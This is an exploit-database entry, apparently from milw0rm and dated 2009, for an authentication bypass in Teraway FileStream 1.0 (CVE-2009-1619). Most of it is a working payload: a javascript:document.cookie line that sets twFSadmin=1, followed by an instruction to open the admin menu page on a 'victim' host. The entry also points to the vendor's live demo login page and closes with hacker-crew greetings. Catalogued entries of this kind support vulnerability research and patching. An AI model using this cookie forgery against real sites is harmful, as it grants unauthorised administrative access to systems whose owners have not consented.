Teraway FileStream 1.0 - Insecure Cookie Handling
Author: ThE g0bL!N
type: webapps
platform: php
port:
date_added: 2009-04-26
date_updated:
verified: 1
codes: OSVDB-54101;CVE-2009-1619
tags:
aliases:
screenshot_url:
application_url:
-------------------------------------[+]
Homepage:http://www.teraway.com
Product: Teraway FileStream 1.0
home:www.h4ckf0ru.com
Note: Hawach x.CJP.x Ballk Ma tedirech Ihdae
Note: Ya Jma3a Ana AfLawi Horr
-------------------------------------
Teraway FileStream 1.0 Insecure Cookie Handling Vuln
-------------------------------------
Exploit:
--------
javascript:document.cookie="twFSadmin=1;path=/";
Then Go to http://victim/path/menu.asp
demo
----
http://www.teraway.com/filestream/demo/login.asp
--------------------------------------------------
Greetz to :
[+] Super_Cristal (My Master) Dos-Dz Team Snakes TeaM
SuB-ZeRo x.CJP.x Mr.tro0oqy - Cyber-Zone- ZoRLu
And ALL Members Of anti-intruders.org
ALL My Friends (Dz)
[+]-------------------------------------[+]
# milw0rm.com [2009-04-27]